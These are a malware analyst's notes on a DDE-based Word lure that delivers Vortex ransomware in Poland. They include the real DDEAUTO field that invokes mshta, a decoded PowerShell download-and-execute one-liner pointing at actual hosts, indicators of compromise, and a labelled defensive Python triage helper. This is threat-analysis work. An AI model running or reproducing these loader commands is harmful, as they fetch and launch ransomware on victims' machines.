Microsoft Office DDE Poland Targeted Vortex Ransomware

pedram@PedBook:~/VXFarm/dde/day-5
$ vti bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9
2017-10-15 18:14:33 INFO Starting VirusTotal Intelligence downloader
2017-10-15 18:14:33 INFO * VirusTotal Intelligence search: bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9
2017-10-15 18:14:33 INFO * Number of files to download: 100
2017-10-15 18:14:33 INFO Creating folder to store the requested files
2017-10-15 18:14:33 INFO Retrieving page of file hashes to download
2017-10-15 18:14:33 INFO Retrieved 1 matching files in current page, queueing them
2017-10-15 18:14:33 INFO No more matching files
2017-10-15 18:14:33 INFO Waiting for queued downloads to finish
2017-10-15 18:14:33 INFO Downloading file bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9
2017-10-15 18:14:34 INFO bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 download was successful
2017-10-15 18:14:40 INFO The downloaded files have been saved in ./

# Here's the meat: mshta.exe is the pivot, masked behind a Word path that walks back out with ..\ components:

DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://w-szczecin.pl/img2/NEW15_10.doc/index.hta

$ wget http://w-szczecin.pl/img2/NEW15_10.doc/index.hta
--2017-10-15 18:15:08-- http://w-szczecin.pl/img2/NEW15_10.doc/index.hta
Resolving w-szczecin.pl... 91.231.140.161
Connecting to w-szczecin.pl|91.231.140.161|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3444 (3.4K)
Saving to: ‘index.hta’
2017-10-15 18:15:09 (109 MB/s) - ‘index.hta’ saved [3444/3444]

pedram@PedBook:~/VXFarm/dde/day-5
$ cat index.hta


Out[38]: '\n\n\n\n\n\n\n'

In [40]: print base64.b64decode("UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AH
...: MAdAB5AGwAZQAgAG0AaQBuAGkAbQBpAHoAZQBkACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBu
...: AGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AC0AcwB6AGMAegBlAGMAaQBuAC4AcABsAC8AaQBtAGcAMgAvAHMANQAwAC4AZQB4AGUAJwAsAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAcw
...: BzAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAG4AdgBzAHMALgBlAHgAZQAdICkA")
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle minimized -command (New-Object System.Net.WebClient).DownloadFile('http://w-szczecin.pl/img2/s50.exe',”$env:APPDATA\nvss.exe”);Start-Process (”$env:APPDATA\nvss.exe”)
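A triage helper for this chain, added here as an example and not part of the author's IPython session: it resolves the `..` walk-back in the DDEAUTO field to show which binary actually launches, decodes the base64 with the same UTF-16LE encoding PowerShell's -EncodedCommand uses, normalises the U+201D smart quotes that garbled the printout above, and lists URLs, drop paths and evasion flags. The sample field and command are constructed to mirror the ones in these notes; the host example.invalid is a placeholder.

```python
"""Triage helpers for a DDE -> mshta -> PowerShell chain (added example, not the author's code)."""
import base64
import re

# Constructed sample input, modelled on the field quoted in the notes; the host is a placeholder.
DDE_FIELD = (r'DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..'
             r'\\windows\\system32\\mshta.exe "http://stage.example.invalid/img2/NEW15_10.doc/index.hta"')

# Constructed command using the same U+201D quote delimiters seen in the real blob, encoded as
# PowerShell -EncodedCommand expects (UTF-16LE, then base64).
SAMPLE_CMD = ('PowerShell -ExecutionPolicy bypass -noprofile -windowstyle minimized -command '
              '(New-Object System.Net.WebClient).DownloadFile(\'http://stage.example.invalid/img2/s50.exe\','
              '\u201d$env:APPDATA\\nvss.exe\u201d);Start-Process (\u201d$env:APPDATA\\nvss.exe\u201d)')
SAMPLE_B64 = base64.b64encode(SAMPLE_CMD.encode('utf-16-le')).decode('ascii')

QUOTES = {0x2018: "'", 0x2019: "'", 0x201c: '"', 0x201d: '"'}  # PowerShell accepts these as quotes


def resolve_dde_target(field):
    """Return (claimed_exe, real_exe, argument) for a DDEAUTO field.

    Word stores backslashes doubled; the '..' components let the field start with
    a plausible Office binary while actually launching something else."""
    m = re.match(r'DDEAUTO\s+(\S+)\s+"?([^"]*)"?', field)
    if not m:
        raise ValueError('not a DDEAUTO field')
    raw_path, argument = m.group(1).replace('\\\\', '\\'), m.group(2)
    parts = raw_path.split('\\')
    claimed = next(p for p in parts if p.lower().endswith('.exe'))  # what a user would see first
    resolved = []
    for part in parts:
        if part == '..':
            if len(resolved) > 1:  # never pop the drive letter
                resolved.pop()
        elif part not in ('', '.'):
            resolved.append(part)
    return claimed, '\\'.join(resolved), argument


def decode_powershell_b64(blob):
    """Decode the base64 as -EncodedCommand does (UTF-16LE) and map smart quotes to ASCII."""
    return base64.b64decode(blob).decode('utf-16-le').translate(QUOTES)


def extract_iocs(command):
    """Pull URLs, drop paths and the evasion flags out of a decoded PowerShell one-liner."""
    flags = ['-ExecutionPolicy bypass', '-windowstyle minimized', 'DownloadFile', 'Start-Process']
    return {
        'urls': re.findall(r'https?://[^\s\'"();]+', command),
        'drops': sorted(set(re.findall(r'\$env:\w+\\[^\s\'"();]+', command))),
        'flags': [f for f in flags if f.lower() in command.lower()],
    }


if __name__ == '__main__':
    print(resolve_dde_target(DDE_FIELD))
    print(extract_iocs(decode_powershell_b64(SAMPLE_B64)))
```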

Pull down the .exe ... first upload to VT:





This final .exe payload masquerades as an NVIDIA service. Joe Sandbox report:


Communicates with:

  • beer-ranking[.]pl

The domain was registered on 2017-10-14 using an address tied to nearly 600,000 other domains:


It's ransomware. Initially we see traffic to fetch a unique crypto key:

/gen
B8DGOzr9KX*WA6RI2GCESq9uLEL*P8S115qz(srIZ)(84PBQ5N4HNXM8!74K0HwKxxSuzUM8SJ0H9!7YIU_6CLYxCMR*4YH@5@))OK6r4PIXLAF34ETqZCy!Y08MHzGxsFuQ0@SNJ!u5uJR9Yw@GHrC_1tLsC1zEqD50xIyQEDFIW7CE*wTDy6C89X!uItJIHzsOQA)4MExsuIGrO@EW0QOTyKZPOr85A!D0wCOSPUUU(!WM69sPKRtR!2rJ3@z(5MY@YwMy1r2Z(Hu3BxD

The ransomware is Vortex: